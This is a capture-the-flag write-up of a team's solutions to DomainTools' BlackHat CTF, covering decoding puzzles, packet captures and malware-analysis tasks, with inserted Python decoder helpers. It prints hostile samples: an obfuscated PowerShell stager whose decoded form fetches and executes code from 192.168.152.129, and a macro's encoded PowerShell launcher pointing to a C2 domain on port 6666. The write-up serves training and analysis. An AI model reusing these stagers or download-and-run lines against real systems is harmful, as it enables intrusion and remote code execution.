This year we participated in the BlackHat CTF challenge organized by DomainTools.
Our team, Homeless, took 8th place.
Write-ups
Flip It & Reverse It! (10)
Solution:
To solve this task we wrote the words in reverse order and got the following text:
domain tools rules!
And this is the flag for this task.
Powershell Fun! (20)
Solution:
We checked the file content:
& ( $enV:comSPec[4,15,25]-joiN'')(NeW-ObjECT SySTem.io.CoMPResSIOn.dEFLateSTrEam([io.MeMORYSTReAM] [SySTem.CoNvERt]::FROmbaSe64STRIng( 'PVHRitswEPwVPbSWfSSH1lpZ0j05LaUVnMWhCxgcQl98GB8hV2joS9t/76xb+mBrvJqdnR1Xqq5/HMp6+HD5pPTdMJc73dznw/BysjuiXXvev76tV60bVZ+ej2XNn88PD69v6VorrdWu1sEnIu7JuEzUFTJU2BXf9kRUiNyMarLtaGMV7EAURttmak0fQsKx2Ha20s4jiJU8louLMwQnEQPNthMbXBnQaCGKEzsMpSVCwnRbNUbpz7btfRhREKXMXR+8fM0xTJ2HuVBBd5AK5KDRTUwzd7kL8ErwHOUigzhvAzygScGK+PRvT5wGonaAKduNWKIKQVaq2GaYJ2pHFyr2mX3hODg/O4MhvWBeXAe8cKycnZwZuRs5LiA43yMItnjDZITSwBbZzNEjCAvzbrG8bDNyjJNgKjYiwZ5d5eGJCAEzoiPxh20Y/4TweEkPddNLClKSJEjCZPQnT7Jc2nIzgo1W++eny3rUs6Bvj+mo9KT3358u6aZ0/n9dSe1xvelBg3ZJR71sd1tD0sJKN13+8qV1BESHwF7/Uu/Vz1qdPn45lLM6rdfj+d3XRv1WjWqaPw==' ) , [SYStem.iO.coMPReSSIOn.COMPrESSIONMOde]::DEComPreSS) |foreAch-oBJEct{ NeW-ObjECT IO.sTreAMrEADeR($_, [SySTEm.tExT.ENcodiNg]::asCii)}| foReaCh-OBjEct {$_.rEAdTOend()} )
Then we decoded the base64 string passed to FROmbaSe64STRIng using Base64 followed by Raw Inflate in CyberChef (https://gchq.github.io/CyberChef).
From the decoded output we extracted the list of numbers from the following string (the letters and symbols between the digits are only separators):
87I114@105N116R101R45R72@111R115d116I32W39&83M118W32N120@88I120g32d34@104W116&116&34R59d105Z101R88I32Z40&110@101g119Z45I111g98I106@101g99W116N32@78W101&116N46@87W101d98Z67R108&105M101d110I116Z41d46N68R111@119d110N108d111g97N100I83W116Z114@105Z110W103M40&36W120&88N120&43N34R112W58&47N47R49M57d50d46@49M54g56d46g49&53Z50W46W49g50d57@34@43@34&109N34M43d34d97Z103R105g34g43N34N99Z34g41R39g32@45&70W111M114d101W103@114N111N117&110d100@67R111N108&111g114g32I71Z114I101&101Z110
which gave:
87, 114, 105, 116, 101, 45, 72, 111, 115, 116, 32, 39, 83, 118, 32, 120, 88, 120, 32, 34, 104, 116, 116, 34, 59, 105, 101, 88, 32, 40, 110, 101, 119, 45, 111, 98, 106, 101, 99, 116, 32, 78, 101, 116, 46, 87, 101, 98, 67, 108, 105, 101, 110, 116, 41, 46, 68, 111, 119, 110, 108, 111, 97, 100, 83, 116, 114, 105, 110, 103, 40, 36, 120, 88, 120, 43, 34, 112, 58, 47, 47, 49, 57, 50, 46, 49, 54, 56, 46, 49, 53, 50, 46, 49, 50, 57, 34, 43, 34, 109, 34, 43, 34, 97, 103, 105, 34, 43, 34, 99, 34, 41, 39, 32, 45, 70, 111, 114, 101, 103, 114, 111, 117, 110, 100, 67, 111, 108, 111, 114, 32, 71, 114, 101, 101, 110
Then we converted the decimal values to ASCII text and got the URL, which is the flag.
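The decimal-to-text step above, as an added Python example that is not code from the original write-up: it pulls the digit runs out of the noisy string (the letters and symbols between them are separators), maps each code to its ASCII character, and then joins the double-quoted fragments that the decoded command concatenates, which is how the URL is recovered. The function names are my own.

```python
import re

# Constructed from the write-up: the noisy string pulled out of the decoded
# PowerShell, with separator characters sitting between the decimal codes.
NOISY = "87I114@105N116R101R45R72@111R115d116I32W39&83M118W32N120@88I120g32d34@104W116&116&34R59d105Z101R88I32Z40&110@101g119Z45I111g98I106@101g99W116N32@78W101&116N46@87W101d98Z67R108&105M101d110I116Z41d46N68R111@119d110N108d111g97N100I83W116Z114@105Z110W103M40&36W120&88N120&43N34R112W58&47N47R49M57d50d46@49M54g56d46g49&53Z50W46W49g50d57@34@43@34&109N34M43d34d97Z103R105g34g43N34N99Z34g41R39g32@45&70W111M114d101W103@114N111N117&110d100@67R111N108&111g114g32I71Z114I101&101Z110"


def extract_codes(s):
    """Return every run of digits as an int; whatever sits between runs is noise."""
    return [int(m) for m in re.findall(r"\d+", s)]


def codes_to_text(codes):
    """Map decimal ASCII codes to text, rejecting anything outside printable ASCII."""
    out = []
    for c in codes:
        if not 32 <= c <= 126:
            raise ValueError(f"code {c} is not printable ASCII")
        out.append(chr(c))
    return "".join(out)


def decode_noisy(s):
    """Full pipeline: noisy string -> list of codes -> text."""
    return codes_to_text(extract_codes(s))


def string_literals(text):
    """Pull the double-quoted fragments; the decoded command concatenates them."""
    return re.findall(r'"([^"]*)"', text)


if __name__ == "__main__":
    codes = extract_codes(NOISY)
    print(", ".join(map(str, codes)))
    text = decode_noisy(NOISY)
    print(text)
    # The pieces the script glues together with '+' form the URL.
    print("".join(string_literals(text)))
```

The same two helpers work on any "decimal codes with junk between them" string; only the quoted-fragment step is specific to a command built by string concatenation.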
Keylogging is Fun (25)
Solution:
We used scdbg to solve this task. After running it we checked the result of the shellcode emulation.
As a result we got the path "C:\Windows\Temp\log.bin"
Messy JS! (30)
Solution:
We used ltrace. It intercepts and records the dynamic library calls made by the executed process and the signals that process receives.
We got the flag in its output:
...
[pid 3001] inet_addr("127.0.0.1") = 0x100007f
[pid 3001] htons(1984, 0x7fc68146c950, 0x100007f, 0) = 0xc007
...
Flag: 1984
Guess the Pass (40)
Solution:
After analyzing the strings in the binary, we discovered the following data:
...
encodeeJyzMNdRMDQwBBEWOgqWlkCGIZhnCRU3NdBRMDODyZtD1RiAtZlARAwNzQDKrwzB\nbase64
...
We used CyberChef to decode and get the flag:
Flag: Welcome2Blackhat
Macho Madness (40)
Solution:
We checked the ZIP file using the deployed VM and got port 1337.
Flag: 1337
Doggo Secrets (10)
Solution:
After extracting the archive we got the file oh_hi.gpj.
Then we changed the file extension to .jpg and opened it with an image viewer.
The image contained the flag DT_CTF_123!@#
Flag: DT_CTF_123!@#
Noise To Signal (20)
oh_hi.zip
Solution:
We used a text analyzer to look for human-readable words.
After several minutes of searching, we discovered the word phisheye, which was the flag.
Flag: phisheye
Sweet logo, dude! (20)
Solution:
First we unzipped the file (logo.jpg was actually an archive).
Inside we found the file hmmm.txt with the following text:
FKWcp1W1oTImZGVm
Then we tried different decodings and finally got the flag:
Flag: IrisRules123
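A small layer-peeling decoder for the two "try different decodings" tasks above (Guess the Pass and Sweet logo, dude!), added here as an example and not part of the write-up: it recognises a zlib header, plain Base64 and ROT13-wrapped Base64, applies whichever fits, and repeats until nothing applies. Run on the contents of hmmm.txt it stops at the flag after a single ROT13-then-Base64 step; on the Guess the Pass string the first layer is Base64 over a zlib stream. The function names and the ordering of the checks are my own choices.

```python
import base64
import binascii
import codecs
import zlib

# Both samples are the encoded strings quoted in the write-up; the surrounding
# "encode" / "\n" / "base64" fragments from the strings dump are stripped.
GUESS_THE_PASS = b"eJyzMNdRMDQwBBEWOgqWlkCGIZhnCRU3NdBRMDODyZtD1RiAtZlARAwNzQDKrwzB"
SWEET_LOGO = b"FKWcp1W1oTImZGVm"

# 0x78 first byte (deflate, 32K window) followed by one of the common FLG bytes.
ZLIB_MAGICS = (b"\x78\x01", b"\x78\x5e", b"\x78\x9c", b"\x78\xda")


def is_printable(data):
    """True when every byte is printable ASCII or ordinary whitespace."""
    return bool(data) and all(32 <= b <= 126 or b in (9, 10, 13) for b in data)


def try_zlib(data):
    """Decompress only when the two-byte zlib header is present."""
    if data[:2] not in ZLIB_MAGICS:
        return None
    try:
        return zlib.decompress(data)
    except zlib.error:
        return None


def try_base64(data):
    """Decode, but keep the result only if it is something we can keep working on."""
    try:
        out = base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None
    if is_printable(out) or out[:2] in ZLIB_MAGICS:
        return out
    return None


def try_rot13_base64(data):
    """ROT13 is a common wrapper around Base64: rotate the letters, then decode."""
    if not is_printable(data):
        return None
    rotated = codecs.encode(data.decode("ascii"), "rot_13").encode("ascii")
    return try_base64(rotated)


# Order matters: a zlib header is unambiguous, plain Base64 is the usual next
# guess, and ROT13-then-Base64 is only tried when plain Base64 yields garbage.
STEPS = (("zlib", try_zlib), ("base64", try_base64), ("rot13+base64", try_rot13_base64))


def peel(data, max_layers=8):
    """Strip encoding layers until none applies; returns [(layer_name, output), ...]."""
    layers = []
    for _ in range(max_layers):
        for name, step in STEPS:
            out = step(data)
            if out is not None and out != data:
                layers.append((name, out))
                data = out
                break
        else:
            break  # no step applied: this is as far as the heuristics go
    return layers


def final_text(data):
    """Convenience wrapper: the innermost result, or the input if nothing applied."""
    layers = peel(data)
    return layers[-1][1] if layers else data


if __name__ == "__main__":
    for sample in (GUESS_THE_PASS, SWEET_LOGO):
        print(sample.decode())
        for name, out in peel(sample):
            print(f"  {name:>13}: {out[:60]!r}")
```

The printable-output check is what makes the ROT13 branch reachable: hmmm.txt is itself valid Base64 alphabet, so without it the decoder would accept the binary junk from the first decode and stop there.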
Hack the Hacker (25)
Solution:
We used Wireshark for this task. We checked the internal traffic and discovered the IP address that brute-forced 192.168.152.135.
Finally we got the flag from the Basic auth header
Authorization: Basic emVyb2Nvb2w6aGFja2Vy, which base64-decodes to zerocool:hacker.
Flag: hacker
Hire the Hacker (30)
Solution:
First, we renamed DadeResume.docm to DadeResume.zip.
Then we checked vbaProject.bin using olevba and found some embedded PowerShell code:
...
cxn = "powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg"
cxn = cxn + "BlAHIAUwBpAE8AbgBUAGEAYgBsAEUALgBQAFMAVgBFAFIAcwBp"
cxn = cxn + "AG8AbgAuAE0AQQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABkAD"
cxn = cxn + "MAOQA4ADIAPQBbAFIAZQBGAF0ALgBBAFMAcwBlAG0AQgBsAHkA"
...
We concatenated the contents of all the cxn variables into one string and decoded it using base64.
The result contained several more encoded strings; after base64-decoding them we got the flag.
aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA -> http://supersekretdomain.net:6666
Flag: supersekretdomain.net
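The decoding chain for the macro's payload, as an added Python example that is neither the write-up's nor olevba's code: a PowerShell -enc argument is Base64 over UTF-16LE text, so the joined cxn fragments are decoded in that order, and the resulting script text is then scanned for further Base64 runs, which is how strings like the one above give up the URL. The fragments are the four pieces quoted above (the olevba output was truncated, so they are only the start of the real payload), the sample script line is constructed, and the function names are my own.

```python
import base64
import binascii
import re

# The four cxn pieces quoted in the write-up, in order (truncated in the
# original, so this is only the opening of the real payload).
CXN_FRAGMENTS = [
    "SQBmACgAJABQAFMAVg",
    "BlAHIAUwBpAE8AbgBUAGEAYgBsAEUALgBQAFMAVgBFAFIAcwBp",
    "AG8AbgAuAE0AQQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABkAD",
    "MAOQA4ADIAPQBbAFIAZQBGAF0ALgBBAFMAcwBlAG0AQgBsAHkA",
]
# The inner string quoted in the write-up that decoded to the URL.
INNER = "aAB0AHQAcAA6AC8ALwBzAHUAcABlAHIAcwBlAGsAcgBlAHQAZABvAG0AYQBpAG4ALgBuAGUAdAA6ADYANgA2ADYA"
# Constructed stand-in for a line of the decoded stage that embeds INNER.
SCRIPT = "$u = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('" + INNER + "'))"

# Long runs of Base64 alphabet; 20+ chars keeps ordinary identifiers out.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_enc_payload(b64):
    """powershell -enc takes Base64 of UTF-16LE text, so decode in that order."""
    raw = base64.b64decode(b64)
    return raw.decode("utf-16-le", errors="replace")


def find_inner_strings(text):
    """Return every long Base64-looking run inside decoded script text."""
    return B64_RUN.findall(text)


def decode_inner(candidate):
    """Try UTF-16LE first (the usual choice inside -enc payloads), then ASCII.
    Returns None when the candidate is not valid Base64 or decodes to binary junk."""
    try:
        raw = base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None
    # UTF-16LE ASCII text has a zero byte in every odd position.
    if raw and len(raw) % 2 == 0 and raw[1::2] == b"\x00" * (len(raw) // 2):
        return raw.decode("utf-16-le")
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def decode_all_inner(text):
    """Pair each candidate with what it decodes to, skipping undecodable ones."""
    results = []
    for cand in find_inner_strings(text):
        decoded = decode_inner(cand)
        if decoded is not None:
            results.append((cand, decoded))
    return results


if __name__ == "__main__":
    stage = decode_enc_payload("".join(CXN_FRAGMENTS))
    print("stage starts with:", stage[:40])
    for cand, decoded in decode_all_inner(SCRIPT):
        print(f"{cand[:24]}... -> {decoded}")
```

Real payloads often nest more than one such layer, so feeding each decoded result back through decode_all_inner until nothing new appears is the natural loop; the zero-byte test is what keeps UTF-16LE strings from being mistaken for ASCII ones.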
RIP Your E-Commerce Website (40)
Solution:
After deobfuscating the JS code and several minutes of analysis, we got the flag.
Flag: http://domaintoolsctf.com/checkout/form.js
SHA1 is dead, long live SHA1! (10)
Solution:
This task was really easy; we just used sha1-online.com